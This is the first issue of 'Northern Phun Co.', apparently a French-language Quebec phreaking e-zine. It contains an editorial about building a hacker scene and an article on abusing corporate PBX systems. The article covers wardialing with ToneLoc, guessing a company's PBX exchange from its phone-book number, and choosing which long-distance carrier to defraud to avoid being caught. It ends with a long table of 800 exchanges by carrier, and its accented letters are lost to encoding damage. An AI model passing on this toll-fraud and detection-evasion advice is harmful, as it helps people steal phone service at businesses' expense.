
            
                                                
           
           
             
                      
                       
                            
                            

      ͸
        N  O  R  T  H  E  R  N     P  H  U  N      C  O  .  
      


Dans ce premier numro de NPC:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ͻ
SUJET                              AUTEUR                 
Ķ
Table des matires                 -=ThE PoSSe=-          
Introduction  NPC                 Blitzkrieg             
Ces fameux PBXs...                 Atreid Bevatron        
Anthologie de la 'lamerosit'      Mental Floss           
Pro-Phile de Yakoul                Blitzkrieg             
Smokin' banana's plems             Coaxial Karma          
Trashing, Bell Canada Style        Blitzkrieg             
Crossin' change machines           Coaxial Karma          
Beginning hacking VAX/VMS          The Subhuman Punisher  
Crossin' change machines II        Coaxial Karma          
Virus NPC-011                      Blitzkrieg/Nancy Reagan
Conclusion                         THX 1138               
ͼ

Staff  : Atreid Bevatron             Contributors : Nancy Reagan
         Blitzkrieg                                 THX 1138
         Coaxial Karma
         Mental Floss
         The Subhuman Punisher


Comment nous rejoindre :
~~~~~~~~~~~~~~~~~~~~~~~~~

Call Medic BBS at 418-682-8128 ...leave message to user "Northern Phun Co".

Note:    For your discretion sake, the sysop has provided us (and you) with a   
         Guest account to leave messages to NPC. The UserName is "GUEST" and the
         password is "GUEST" too... on that account, you can do nothing but 
         leave private message to NPC with the "&" function at the main menu.

         Racontez-nous n'importe quoi qui vous passe par la tte... Des
         suggestions de chroniques dans NPC, des commentaires, des comptes--
         rendre avec des membres de NPC, votre Curriculum si vous voulez faire
         application  NPC ou un texte pour notre futur forum des lecteurs. Vous 
         pouvez tout aussi bien nous contacter personnellement pour toutes      
         questions techniques relatives  l'underground, la plupart des "membres" 
         de NPC sont sur les bbs 'pirates' de Qubec Beach!

         Et en terminant, il n'y a pas de rseau de distribution proprement dit
         de NPC, m'enfin, il devra tre disponible dans une section <NO-RATIO>
         dans la plupart des boards ShareWare/UndErGr0unD.



Greets :   Mdic's Sysop, Pixture God, Psychedelic Madness (for providing us
~~~~~~~~   with hours of laughing)


Dans NPC #2 :
~~~~~~~~~~~~~


-Complete UNiX hacking
-Injector pour virii
-Getting Cartes D'appels
-VAX/VMS hacking part two
-And many more interesting stuff...

            
             
      ͻ
     ڶ N   ǿ    Ŀ         Ŀ  Ŀ Ŀ    Ŀ
  Ĵ  P  Ŀ      Ŀ    Ŀ ſ     Ĵ1
        C                                
      ͼ                    



                             NORTHERN PHUN CO.
                             --=IT'S ALIVE!=--

                                 DITORIAL
                                    PAR
                                BLITZKREIG



     Ouais! This bitch is getting off the ground! And it's gonna
ride high! Northern Phun Co. est venu au monde, pour vous servir,
m'sieurs dames! Qui est NPC? Les collaborateurs de cette revue
se sont rencontrs ici et l, au dtour d'une boite tlphonique
ou d'un bac  ordures du Bell. Le plaisir du phreak est galement
partag par ces complices, mais nos horizons ne se limitent pas
l. Que veut NPC? Aider  former les hackers de demain, mettre
le Qubec sur la carte des repaires de cyberpunks qualifis,
permettre aux groupes jusqu'ici isols de se retrouver, bref,
contribuer  l'closion et  l'avancement d'une scne underground
au Qubec QUI NE DEVRA RIEN aux Amerloques, aux Allemands, ou 
tout autre groupe qui revendique le statut de Nation Des Hackers.
Et on va le faire en anglais et en FRANCAIS, parce que le
bilinguisme est  notre image. L'usage du francais dans un mag
underground ne nous donne pas de complexes, loin de l! Hack-Tik
(Pays-Bas) est en nerlandais, C.C.C. (Chaos Computer Club)
publie sa bible en allemand. Northern Phun Co. a vu le jour de
ce ct-ci du Rio Grande, l o la langue de Molire (et du
marquis de SADE!) fleurit encore. C'est pas parce qu'on est
voisin de l'Imprial USA qu'on est obligs de crcher  la mme
enseigne. On va faire mieux, on va innover, on va diffuser nos
ragots et nos histoires  dormir debout DANS LES DEUX LANGUES!
And why not? Si vous tes pas fiers de votre langue natale, c'est
que vous tes ns du mauvais ct de la frontire, les mecs!
Cardez-vous un dmnagement chez les bloques, et crissez-nous la
paix! Northern Phun Co. n'est pas n pour un petit pain, NPC ne
dsire pas passer pour ce qu'il n'est pas, et si ca prend une job
de bras pour expliquer  notre public qu'il n'est crit NULLE
PART que l'underground se passe obligatoirement en anglais, eh
bien soit! On va en faire la dmonstration, numro aprs numro.
Car cei ne sera pas l'affaire d'un soir, un accident de
parcours, un coup de chance, ou tout autre dfinition lame que
trouveront nos dtracteurs. Faites rentrer les femmes dans la
maison, cachez vos enfants dans le placard  balais, cadenassez
votre porte, braves gens, NPC est l pour y rester!

     Autre quiproquo que nous dsirons viter: NPC et les
lamers... Vous avez tous votre propre petite dfinition de ce
qu'est un lamer. Mieux encore: vous tes gnralement persuads
que votre voisin en est un! Un mec vous laisse un message sur un
bab pour vous demander ce qu'est un PBX et paf! vous croyez avoir
dcouvert un autre lamer! Erreur, mon cher Watson! Ce que tu
viens de rencontrer, c'est un mec qui, avec un minimum de
formation et d'encouragement pourra peut-tre devenir un pirate
formidable! NPC publiera des articles pour les novices dsireux
d'apprendre, que ce soit  propos des viriis ou du carding, parce
qu'il est tout simplement LOGIQUE d'apprendre  marcher avant
d'apprendre  courir... Ceux qui lvent le nez sur les dbutants
et refusent de les coacher sont parfois ceux-l mme qui ont d
tre aids  leurs dbuts, et qui ne sont pas capables de
retourner  la communaut ce qu'ils y ont pris... C'est la
dfinition par excellence du lamer typique, nous semble-t'=l...

     L'union fait la force, nous esprons que vous en tes
convaincus. NPC dsire contribuer au rapprochement de tous les
cowboys du futur qui trainent ici et l, parce que lorsque
l'exprience et la connaissance se partagent, les gains de la
multitude connaissent des bonds prodigieux...

NPC enfin, because we only care about the best... and we hope you
will too...



PHUN! PHUN! PHUN! IN THE CYBERSPACE!


      ͻ
     ڶ N   ǿ    Ŀ         Ŀ  Ŀ Ŀ    Ŀ
  Ĵ  P  Ŀ      Ŀ    Ŀ ſ     Ĵ1
        C                                
      ͼ                    


                      ͻ
                       Private Branch eXchange 
                               -=PBX=-         
                      ͼ

                                  PAR

                            AtrEiD BeVaTRoN


      Est-ce que tu scannes pour les PBX ?   Voil une putain de
question que l'on peut lire de deux  trois fois par semaine sur tous
les bab pirates de Qubec...  C'est bien beau de scanner pour les PBX,
mais bordel... J'ai facilement remarqu une tendance plus que dcevante
en ce domaine : l'ignorance...  Pourquoi?  Parce qu'on a beau tre des
supposs experts en tlcommunications, c'est pas en parlant de HOCKEY
ou de CONSTITUTION sur les bbs que la scne d'ici se dveloppera. 
Quelques initis, comme la bande de NPC et moi-mme, se sont malheureu-
sement vus confronts  eux-mmes ds leurs dbuts, ce qui sans aucun
doute a eu un effet nfaste sur la rapidit d'apprentissage, puisque
nous devions rapprendre ce qui tait dj connu.  Moi, je dis que c'est
dommage de devoir rinventer la roue  chaque fois...  Enfin... Je vais
en venir au fait, qui est dans ce cas les PBX...

     PBX = Private Branch eXchange,  pour ceux qui ne le savent pas ou
pour ceux qui croyaient le savoir.  C'est la seule et unique dfinition
qui existe.  Un PBX est un systme de lignes tlphoniques qui relie en
rseau diffrents paliers informatiques et humains.  Les PBX sont
utiliss dans certaines compagnies qui ncessitent des connections
frquentes et des transferts d'informations importants entre les divers
agents de production.  Ils assurent ainsi une communication simple et
accrue entre tous les usagers.  On peut comparer les PBX  un systme
informatique ou mme  un bbs du fait que chaque usager (employ)
possde son propre code de scurit lui permettant d'accder au rseau.
C'est  ces fameux codes que nous nous interresserons.




          
           Structure des PBX

     Les PBX peuvent tre reprsents par un systme de branches, toutes
relies au cerveau du systme, soit le PBX SYSTEM.  Voici un exemple
d'un systme de PBX typique.
         
        ͻ
        Ligne(s) tlphonique(s)               ͻ
              d'entre                         Secrtariat
        ͼ               ͼ
             Ŀ                
  ͻ                                     
  Postes                                                  
    de   Ŀ            ͻ        ͻ
  Travail  Ŀ   IN          IN     Bureaux  
  ͼ           Ķ    ͻ  &          Principaux
                          Ŀ  PBX   OUT         ͼ
                            ĶSYSTEMĿ  
                              ͼ        ͻ
                                OUT    Ķ     Systme de 
                          ͼ     traitement 
                                         de messages
                           Ŀ   ͼ
         ͻ    Ŀ   
         Ligne(s) tlphonique(s)    ͻ
              vers la sortie         Base de donnes
         ͼ     utiliser par 
                                       modem          
                                       ͼ

     Ce qui est reli au IN est ce qui ne peut tre utilis que pour
aller VERS le systme de PBX. On ne peut PAS utiliser toute autre partie
du systme pour rejoindre cette partie.
Exemple : On ne peut PAS utiliser un poste de travail pour faire un
          appel en utilisant la ligne d'entre.

     Ce qui est reli au OUT est ce qui peut tre atteint par les IN. On
ne peut PAS utiliser un OUT pour rejoindre un IN.
Exemple : On ne peut PAS rejoindre le systme du PBX en composant le
          numro correspondant  la ligne tlphonique de sortie.

     Ce qui est reli au IN & OUT est ce qui peut tre rejoint par les
IN -=ET=- ce qui peut rejoindre les OUT.
Exemple : Le secrtariat DOIT pouvoir tre rejoint par les lignes
          tlphoniques d'entre tout en conservant le droit
          d'effectuer des appels sur la ligne de sortie.

     Cette structure n'est videmment que la structure gnrale des PBX
et elle peut varier de systme en systme.  La comprhension de cette
structure de base est capitale avant toute tentative de scan ou de hack
d'un systme de PBX.




          
           Dtecter un PBX

     Je n'ai trouv qu'une seule et unique faon de chercher tous les
PBX qui n'attendent que d'tre hacks : TONELOC...  Ceux qui ont la
malchance de ne pas l'avoir en leur possession, informez-vous, ce n'est
gnralement pas difficile  trouver. Toneloc est le meilleur programme
de scan.  Qu'est-ce que le scan?  C'est simplement l'action de composer
automatiquement des numros de tlphone, et ce sans interruption, dans
le but que votre modem dtecte un son particulier comme la voix, un tone
rgulier, un modem, un Busy...  ToneLoc vous fera un compte-rendu de sa
sance de scan en vous informant de ce qui s'est produit aprs avoir
compos chaque numro.

     Les PBX se caractrisent par le fait que lorsqu'on appelle sur la
ligne d'entre de ce dernier, on obtient un tone rgulier, normalement
semblable  celui qu'on peut entendre lorsqu'on dcroche notre propre
tlphone.  Puisque la fonction principale de Toneloc est de dtecter
des tones OU des modems (jamais les deux en mme temps malheureusement),
Toneloc dtectera donc les PBX qui s'annoncent par un tone, ce qui est
le plus frquent.




          
           O chercher pour les PBX

     On peut dire qu'il existe deux grandes catgories de PBX. Les 800
et les LOCAUX. Voici dans les grandes lignes  leurs caractristiques:

     Les LOCAUX : Pour les dcouvrir et pour les abuser, il vaut mieux
possder une certaine habilet et quelques contacts. En effet, les
locaux ne sont pas extrmement frquents et les quelques fois que j'en
ai trouv, ils taient tout simplement Pas-Hackables...  Le seul atout
majeur sur lequel on peut compter est que Qubec n'a pas connu sa grosse
dose de Phreaking, ce qui a occasionn une totale ignorance de Bell sur
ce dont les phreakers sont capables.  L'unique avantage de cette
infirmit c'est qu'on peut ESPRER que certains quipements lgrement
plus vieux soient trouvs, du genre de ceux qui ne possdent pas de code
(ce qui veux dire qu'on peut passer directement  la ligne de sortie et
faire ses appels!).  Un bon outil pour savoir o chercher est le bon
vieil annuaire tlphonique du Bell.  En effet, quand on y pense, on
peut dja supposer que, et ce n'est qu'un exemple, les bureaux
principaux de la Banque Royale possdent un systme de PBX, tant donn
l'importance de la communication dans une banque et de l'tendue du
pouvoir de celle-ci.  Donc, pour trouver o scanner, on n'a qu' ouvrir
l'anuaire, trouver le numro pour rejoindre les bureaux de la Banque
Royale et remarquer les trois premiers chiffres.  Disons que le numro
du secrtariat est le 543-3456, on peut dj supposer que la ligne
d'entre extrieure se trouvera dans 543-XXXX. Il arrivera
malheureusement que quelques fois, les responsables de la scurit
seront plus malins et n'assigneront pas les mmes chiffres, mais j'ai
remarqu que cela est plutt rare puisqu'il est aussi trs rare qu'un
responsable de la scurit soit malin, situation un peu paradoxale...

     Les 800 : Ils sont ce que je peux dfinir comme tant ma
spcialit.  Du fait qu'ils peuvent se trouver n'importe o au Canada ou
au tats-Unis, les systmes et leur qualit varient considrablement.
C'est d'ailleurs ce qui fait leur faiblesse. La distance en ce monde est
depuis toujours une barrire aux ententes et un agent d'activation  la
papperasserie. De faon gnrale, plus l'loignement entre l'abuseur et
le PBX est grand, plus la paperrasse s'amoncelle, et plus elle bloque
les recours en justice et... LES GROS BILLS!!!  Mais le sentier menant
aux PBX 800 est assez accident et ce n'est qu'avec les bons outils que
l'on peut arriver  escalader la montagne et apprivoiser le dragon qui
nous fera voler  travers le rseau tlphonique mondial...  Au Canada,
c'est trs simple, il y a Bell Canada, point  la ligne! (Bientt
UNITEL!!!!)  Par contre aux Usa, le march est trs divis. Je ne
m'attarderai que sur quatre compagnies : AT&T, Sprint et MCI, Telcom
Canada.
          AT&T : LA grande compagnie aux usa. Je ne cacherai pas que je
          scanne UNIQUEMENT dans les numros 800 appartenant  AT&T.
          C'est la compagnie la plus age, ce qui ne fait pas d'elle la
          plus exprimente et c'est aussi celle qui a le plus tendu
          son territoire  travers les Usa.  Je dirais que c'est la
          seule compagnie que l'on peut encore esprer frauder "sans se
          faire pogner!"

          Sprint & MCI : Ils possdent sans conteste les rseaux de PBX
          les plus perfectionns en Amrique du Nord et mme au
          monde.  La ligne est presque toujours d'une qualit impeccable
          et leur organisation est trs sophistique. La communication
          entre les agents de scurit de ces deux compagnies est
          optimale, ce qui permet une vrification constante et simple
          des fraudes par les oprateurs du PBX.  Ces compagnies
          possdent aussi une caractristique trs particulire. Le
          systme ANI (Automatic Number Identification) permet aux
          oprateurs et  la compagnie de tlphone de savoir d'o
          provient l'appel  la seconde o il est fait.  Les systmes de
          PBX de ces deux compagnies sont faits de telle faon qu'ils
          compilent un fichier qui rassemble la liste des numros de
          tlphones correspondants  TOUS les appels faits au systme
          de PBX.  Le fait que AT&T soit "plus safe" rside dans le
          phnomne que le systme ANI n'est pas fourni (sauf sur
          demande spciale, faite rarement) aux oprateurs de PBX. En
          termes gnraux et simples : MCI & Sprint = SUICIDE!!!!!!

          Telcom Canada : La distance et la paperrasse.  Ces deux
          facteurs sont beaucoup moins levs, donc les chances de "se
          faire pogner" sont plus leves.  Le fait de rsider dans le
          mme pays est aussi un facteur TRS dterminant sur celui du
          risque. De plus, les caractristiques de cette compagnie, qui
          est en fait Bell Canada, sont plutt mconnues et les risques
          que prend l'abuseur du systme en question sont inconnus, ou
          presque. Pour cette raison, et pour la raison logique que la
          distance est proportionnelle  la paperasse: je choisis AT&T.
          Je dirai simplement que je n'ai pas envie d'explorer des
          territoires inconnus  mes dpens lorsque les territoires
          connus sont dj trs acceptables, et que le gibier y abonde
          encore...


Mais comment savoir dans quelle compagnie se situe un certain exchange
800 ?  Assez simple: en consultant la liste suivante.

-------
202  RADIO COMMON CARRIER PAGING
212  RADIO COMMON CARRIER PAGING
213  CINCINNATI BELL TELEPHONE
220  ATX-COMMUNICATIONS
221  AT&T-C
222  AT&T-C
223  AT&T-C
224  LONG DISTANCE FOR LESS
225  AT&T-C
226  ATC
227  AT&T-C
228  AT&T-C
229  CABLE & WIRELESS COMMUNICATIONS
230  NETWORK TELEMANAGEMENT SERVICES
231  AT&T-C
232  AT&T-C
233  AT&T-C
234  MCI TELECOMMUNICATIONS CORPORATION
235  AT&T-C
236  SCHNEIDER COMMUNICATIONS
237  AT&T-C
238  AT&T-C
239  DELTA COMMUNICATIONS, INC.
240  SOUTHERN INTEREXCHANGE SERVICES
241  AT&T-C
242  AT&T-C
243  AT&T-C
244  800 NUMBER SERVICE & ASSIGNMENT CENTER
245  AT&T-C
246  SOUTHWESTERN BELL
247  AT&T-C
248  AT&T-C
249  LASSMAN-WEBER COMMUNICATIONS
251  AT&T-C
252  AT&T-C
253  AT&T-C
254  TOTAL-TEL USA
255  AT&T-C
256  LONG DISTANCE SAVERS
257  AT&T-C
258  AT&T-C
259  LONG DISTANCE SAVERS
260  COM-LINK21
261  SCHNEIDER COMMUNICATIONS
262  AT&T-C
263  TELCOM CANADA
264  LDDS COMMUNICATIONS
265  TELCOM CANADA
266  COM SYSTEMS
267  TELCOM CANADA
268  TELCOM CANADA
269  FIRST DIGITAL NETWORK
270  CLEARTEL COMMUNICATIONS
271  TRAFFIC ROUTING ADMINISTRATION 3
272  AT&T-C
273  800 NUMBER SERVICE & ASSIGNMENT CENTER
274  MCI TELECOMMUNICATIONS CORPORATION
275  MTD/UNITED STATES TRANSMISSION SYSTEMS
276  ONE CALL COMMUNICATIONS, INC.
277  MCI / TDD / SOUTHERNNET, INC.
279  MIDAMERICAN
280  ADVANTAGE NETWORK, INC.
282  AT&T-C
283  MCI TELECOMMUNICATIONS CORPORATION
284  MCI TELECOMMUNICATIONS CORPORATION
286  SOUTHERN NEW ENGLAND TELEPHONE
287  800 NUMBER SERVICE & ASSIGNMENT CENTER
288  MCI TELECOMMUNICATIONS CORPORATION
289  MCI TELECOMMUNICATIONS CORPORATION
292  AT&T-C
293  PROTO-COL
294  AFFORD A CALL
295  ACC LONG DISTANCE CORPORATION
296  LONG DISTANCE SERVICE, INC.
297  AMERICAN EXPRESS TRS
298  COMTEL OF NEW ORLEANS
299  ATC
302  RADIO COMMON CARRIER PAGING
312  RADIO COMMON CARRIER PAGING
320  CONQUEST LONG DISTANCE CORPORATION
321  AT&T-C
322  AT&T-C
323  AT&T-C
324  HOUSTON NETWORKM INC./VXVY TELECOM, INC.
325  AT&T-C
326  US TELCOM, INC./US SPRINT
327  AT&T-C
328  AT&T-C
329  ATC
330  ATC
331  AT&T-C
332  AT&T-C
333  MCI TELECOMMUNICATIONS CORPORATION
334  AT&T-C
335  SCHNEIDER COMMUNICATIONS
336  AT&T-C
337  FIRST DATA RESOURCES
338  AT&T-C
339  800 NUMBER SERVICE & ASSIGNMENT CENTER
340  FIRST FINANCIAL MANAGEMENT CORPORATION
341  AT&T-C
342  AT&T-C
343  AT&T-C
344  AT&T-C
345  AT&T-C
346  AT&T-C
347  US TELCOM, INC./US SPRINT
348  AT&T-C
349  DIRECT COMMUNICATIONS, INC.
350  COM SYSTEMS
351  AT&T-C
352  AT&T-C
353  SCHNEIDER COMMUNICATIONS
354  AT&T-C
355  ATX-COMMUNICATIONS
356  AT&T-C
357  CAM-NET SYSTEMS-INC.
358  AT&T-C
359  US TELCOM, INC./US SPRINT
360  ?
361  TELCOM CANADA
362  AT&T-C
363  TELCOM CANADA
364  HOUSTON NETWORKM INC./VXVY TELECOM, INC.
365  MCI TELECOMMUNICATIONS CORPORATION
366  US TELCOM, INC./US SPRINT
367  AT&T-C
368  AT&T-C
369  MCI / TELECONNECT
370  MCI / TELECONNECT
372  AT&T-C
373  MCI / TELECONNECT
374  INTERNATIONAL TELECHARGE, INC.
375  ATC CIGNAL COMMUNICATIONS
375  ATC
376  ECONO-CALL LONG DISTANCE
377  TELENET COMMUNICATIONS CORPORATION
378  NATIONAL TELEPHONE COMPANY
379  EASTERN MICROWAVE
381  LONG DISTANCE OF MICHIGAN
382  AT&T-C
383  MCI / TELECONNECT
384  FRIEND TECHNOLOGIES
385  HEDGES COMMUNICATIONS /COM CABLE LAYING
386  TELECABLE CORPORATION
387  TELCOM CANADA
388  MCI TELECOMMUNICATIONS CORPORATION
390  ECONO-CALL
392  AT&T-C
393  PIONEER TELEPHONE /EXECULINES OF FLORIDA
394  CABLE & WIRELESS COMMUNICATIONS
395  MCI TELECOMMUNICATIONS CORPORATION
396  BANK OF AMERICA
397  MCI / TELECONNECT
399  AMERICALL CORPORATION (CA)
402  RADIO COMMON CARRIER PAGING
412  RADIO COMMON CARRIER PAGING
420  TMC OF SOUTHWEST FLORIDA
421  AT&T-C
422  AT&T-C
423  AT&T-C
424  AT&T-C
425  TELE TECH, INC.
426  AT&T-C
427  800 NUMBER SERVICE & ASSIGNMENT CENTER
428  AT&T-C
429  T-TEL
431  AT&T-C
432  AT&T-C
433  AT&T-C
434  AMERIGON
435  AT&T-C
436  INDIANA SWITCH, INC.
437  AT&T-C
438  AT&T-C
439  800 NUMBER SERVICE & ASSIGNMENT CENTER
440  TEX-NET
441  AT&T-C
442  AT&T-C
443  AT&T-C
444  MCI TELECOMMUNICATIONS CORPORATION
445  AT&T-C
446  AT&T-C
447  AT&T-C
448  AT&T-C
449  UNITED TELCO / TELAMAR
450  US LINK LONG DISTANCE
451  AT&T-C
452  AT&T-C
453  AT&T-C
454  ALLNET COMMUNICATIONS SERVICES
455  LDD, INC.
456  MCI TELECOMMUNICATIONS CORPORATION
457  AT&T-C
458  AT&T-C
459  NORTHWEST BELL
460  NATIONAL TELEPHONE EXCHANGE
461  TELCOM CANADA
462  AT&T-C
463  TELCOM CANADA
464  800 NUMBER SERVICE & ASSIGNMENT CENTER
465  TELCOM CANADA
466  ALLNET COMMUNICATIONS SERVICES
467  LDDS COMMUNICATIONS
468  AT&T-C
469  IOWA NETWORK SERVICES
471  ALLNET COMMUNICATIONS SERVICES
472  AT&T-C
473  US TELCOM, INC./US SPRINT
474  VIRGIN ISLAND TELEPHONE
475  MCI / TELECONNECT
476  MCI / TDD / SOUTHERNNET, INC.
477  MCI TELECOMMUNICATIONS CORPORATION
478  ALASCOM
479  800 NUMBER SERVICE & ASSIGNMENT CENTER
481  GTE/NORTH
482  AT&T-C
483  GTE/FLORIDA
484  MCI / TELECONNECT
485  MCI / TELECONNECT
486  CABLE & WIRELESS COMMUNICATIONS
487  US TELCOM, INC./US SPRINT
488  US TELCOM, INC./US SPRINT
489  LDDS COMMUNICATIONS
492  AT&T-C
493  INTERNATION PACIFIC
494  NETWORK TELEPHONE SERVICE
495  J-NET COMMUNICATIONS
496  TRAFFIC ROUTING ADMINISTRATION 3
502  RADIO COMMON CARRIER PAGING
512  RADIO COMMON CARRIER PAGING
520  PENTAGON COMPUTER DATA, LTD.
521  AT&T-C
522  AT&T-C
523  AT&T-C
524  AT&T-C
525  AT&T-C
526  AT&T-C
527  AT&T-C
528  AT&T-C
529  MIDCO COMMUNICATIONS
530  VARTEC NATIONAL, INC.
531  AT&T-C
532  AT&T-C
533  AT&T-C
534  TRAFFIC ROUTING ADMINISTRATION 3
535  AT&T-C
536  ALLNET COMMUNICATIONS SERVICES
537  AT&T-C
538  AT&T-C
539  FIRST PHONE
540  800 NUMBER SERVICE & ASSIGNMENT CENTER
541  AT&T-C
542  AT&T-C
543  AT&T-C
544  AT&T-C
545  AT&T-C
546  US TELCOM, INC./US SPRINT
547  AT&T-C
548  AT&T-C
549  CALL AMERICA
550  CALL-AMERICA
551  AT&T-C
552  AT&T-C
553  AT&T-C
554  AT&T-C
555  AT&T-C
556  AT&T-C
557  ALLNET COMMUNICATIONS SERVICES
558  AT&T-C
561  TELCOM CANADA
562  AT&T-C
563  TELCOM CANADA
564  800 NUMBER SERVICE & ASSIGNMENT CENTER
565  TELCOM CANADA
566  ALLNET COMMUNICATIONS SERVICES
567  TELCOM CANADA
568  MCI TELECOMMUNICATIONS CORPORATION
569  TELESPHERE NETWORK
572  AT&T-C
574  ACCESS LONG DISTANCE
575  UNITED COMMUNICATIONS, INC.
577  TELENET COMMUNICATIONS CORPORATION
579  LINTEL SYSTEMS
580  WESTEL
582  AT&T-C
583  MCI / TELECONNECT
584  MCI / TELECONNECT
586  ACTION TELECOM COMPANY
587  LONG DISTANCE FOR LESS
588  ACTION TELECOM COMPANY
589  LITEL
592  AT&T-C
593  MCI / TELECONNECT
594  MCI / TELECONNECT
595  PUERTO RICO TELEPHONE
596  TELECOM "OPTIONS" PLUS, INC.
599  LONG DISTANCE MANAGEMENT
602  RADIO COMMON CARRIER PAGING
612  RADIO COMMON CARRIER PAGING
621  AT&T-C
622  AT&T-C
623  TRAFFIC ROUTING ADMINISTRATION 3
624  AT&T-C
625  NATIONAL DATA CORP
626  AT&T-C
627  MCI TELECOMMUNICATIONS CORPORATION
628  AT&T-C
629  BEEHIVE TELEPHONE
631  AT&T-C
632  AT&T-C
633  AT&T-C
634  AT&T-C
635  AT&T-C
636  CONQUEST COMMUNICATION CORPORATION
637  AT&T-C
638  AT&T-C
639  BURLINGTON TEL
640  800 NUMBER SERVICE & ASSIGNMENT CENTER
641  AT&T-C
642  AT&T-C
643  AT&T-C
644  CALL-AMERICA
645  AT&T-C
646  UNION TELEPHONE COMPANY
647  AT&T-C
648  AT&T-C
649  800 NUMBER SERVICE & ASSIGNMENT CENTER
652  AT&T-C
654  AT&T-C
655  EXECULINE OF SACRAMENTO, INC.
656  AMVOX
657  MCI / TELECONNECT
658  MCI / TELECONNECT
659  US TELCOM, INC./US SPRINT
660  800 NUMBER SERVICE & ASSIGNMENT CENTER
661  TELCOM CANADA
662  AT&T-C
663  TELCOM CANADA
664  MCI TELECOMMUNICATIONS CORPORATION
665  TELCOM CANADA
666  MCI TELECOMMUNICATIONS CORPORATION
667  TELCOM CANADA
668  TELCOM CANADA
669  US TELCOM, INC./US SPRINT
672  AT&T-C
673  MCI / TDD / SOUTHERNNET, INC.
674  MCI / TELECONNECT
675  800 NUMBER SERVICE & ASSIGNMENT CENTER
676  US TELCOM, INC./US SPRINT
677  MCI TELECOMMUNICATIONS CORPORATION
678  MCI TELECOMMUNICATIONS CORPORATION
679  TRANS-NET, INC.
680  PACIFIC TELCOM
682  AT&T-C
683  METROMEDIA LONG DISTANCE
684  NORTHERN TELECOM, INC.
685  MCI TELECOMMUNICATIONS CORPORATION
686  LITEL
687  NTS COMMUNICATIONS
688  MCI TELECOMMUNICATIONS CORPORATION
689  NORTHWEST TELCO
691  DOMIN REPUBLIC TELEPHONE
692  AT&T-C
693  TRI-J
694  TELESCAN
695  MCI TELECOMMUNICATIONS CORPORATION
696  800 NUMBER SERVICE & ASSIGNMENT CENTER
698  800 NUMBER SERVICE & ASSIGNMENT CENTER
699  PILGRIM TELEPHONE CO.
702  RADIO COMMON CARRIER PAGING
712  RADIO COMMON CARRIER PAGING
720  TELEMANAGEMENT CONSULT'T CORP
721  FLEX COMMUNICATIONS
722  AT&T-C
723  MCI TELECOMMUNICATIONS CORPORATION
724  RCI CORPORATION
725  ATC
726  US TELCOM, INC./US SPRINT
727  MCI TELECOMMUNICATIONS CORPORATION
728  MCI / TELECONNECT
729  US TELCOM, INC./US SPRINT
732  AT&T-C
733  US TELCOM, INC./US SPRINT
734  800 NUMBER SERVICE & ASSIGNMENT CENTER
735  US TELCOM, INC./US SPRINT
736  US TELCOM, INC./US SPRINT
737  MERCURY, INC.
738  MERCURY, INC.
741  ATC
742  AT&T-C
743  US TELCOM, INC./US SPRINT
744  TRAFFIC ROUTING ADMINISTRATION 3
745  US TELCOM, INC./US SPRINT
746  FTC COMMUNICATIONS, INCORPORATION
747  MCI / TELECONNECT
748  MCI / TELECONNECT
749  ATC
752  AT&T-C
753  MCI TELECOMMUNICATIONS CORPORATION
754  TEL-SHARE
755  US TELCOM, INC./US SPRINT
756  MCI TELECOMMUNICATIONS CORPORATION
757  TMC OF SOUTH CENTRAL INDIANA
759  MCI TELECOMMUNICATIONS CORPORATION
761  ALTERNATE COMMUNICATIONS TECHNOLOGY
762  AT&T-C
763  TOUCH & SAVE
764  ALASCOM
765  MCI TELECOMMUNICATIONS CORPORATION
766  MCI TELECOMMUNICATIONS CORPORATION
767  US TELCOM, INC./US SPRINT
768  MCI / TDD / SOUTHERNNET, INC.
770  GENERAL COMMUNICATIONS
771  MCI / TDD / SOUTHERNNET, INC.
772  AT&T-C
773  COMPU-TEL INC.
774  TTE OF CHARLESTON
776  US TELCOM, INC./US SPRINT
777  MCI TELECOMMUNICATIONS CORPORATION
778  ELECTRONIC DATA SYSTEMS CORPORATION
779  MCI / TELECONNECT
780  MCI / TDD / SOUTHERNNET, INC.
782  AT&T-C
783  ALLNET COMMUNICATIONS SERVICES
784  AMERICAN LONG LINE
785  SUNSHINE TELEPHONE CO.
786  UNITED/FLORIDA
787  MID ATLANTIC TELECOM
788  US TELCOM, INC./US SPRINT
789  TEL-AMERICA, INC.
792  AT&T-C
794  800 NUMBER SERVICE & ASSIGNMENT CENTER
797  TMC OF SOUTH CENTRAL INDIANA
798  MCI / TELECONNECT
800  US TELCOM, INC./US SPRINT
802  RADIO COMMON CARRIER PAGING
807  NETWORK TELECOMMUNICATIONS
808  AMERITECH AUDIOTEX SERVICES
812  RADIO COMMON CARRIER PAGING
821  AT&T-C
822  AT&T-C
823  TOUCH AMERICA
824  AT&T-C
825  MCI TELECOMMUNICATIONS CORPORATION
826  AT&T-C
827  US TELCOM, INC./US SPRINT
828  AT&T-C
829  US TELCOM, INC./US SPRINT
831  AT&T-C
832  AT&T-C
833  AT&T-C
834  800 NUMBER SERVICE & ASSIGNMENT CENTER
835  AT&T-C
836  MCI / TELECONNECT
837  MCI / TELECONNECT
838  UNITED/INT MN
839  STAR-LINE
841  AT&T-C
842  AT&T-C
843  AT&T-C
844  LDDS COMMUNICATIONS
845  AT&T-C
846  MCI TELECOMMUNICATIONS CORPORATION
847  AT&T-C
848  AT&T-C
849  BUSINESS TELECOM, INC.
850  TK COMMUNICATIONS
851  AT&T-C
852  AT&T-C
853  UNIVERSAL COMMUNICATIONS
854  AT&T-C
855  AT&T-C
857  MCI / TELECONNECT
858  AT&T-C
860  VIRTUAL NETWORK
862  AT&T-C
863  ALLNET COMMUNICATIONS SERVICES
864  TELESPHERE NETWORK
865  HAWAIIAN TELEPHONE
866  MCI TELECOMMUNICATIONS CORPORATION
867  VORTEL
868  MCI / TDD / SOUTHERNNET, INC.
869  US TELCOM, INC./US SPRINT
871  DIGITAL NETWORK, INC.
872  AT&T-C
873  MCI TELECOMMUNICATIONS CORPORATION
874  AT&T-C
875  ALLNET COMMUNICATIONS SERVICES
876  MCI TELECOMMUNICATIONS CORPORATION
877  US TELCOM, INC./US SPRINT
878  ALLNET COMMUNICATIONS SERVICES
879  MCI TELECOMMUNICATIONS CORPORATION
880  NATIONAL TELECOMMUNICATIONS
881  NATIONAL TELECOMMUNICATIONS
882  AT&T-C
883  CABLE & WIRELESS COMMUNICATIONS
884  US TELCOM, INC./US SPRINT
885  TELVUE,CORP
886  ALLNET COMMUNICATIONS SERVICES
887  EASTERN TELEPHONE SYSTEMS, INC.
888  MCI TELECOMMUNICATIONS CORPORATION
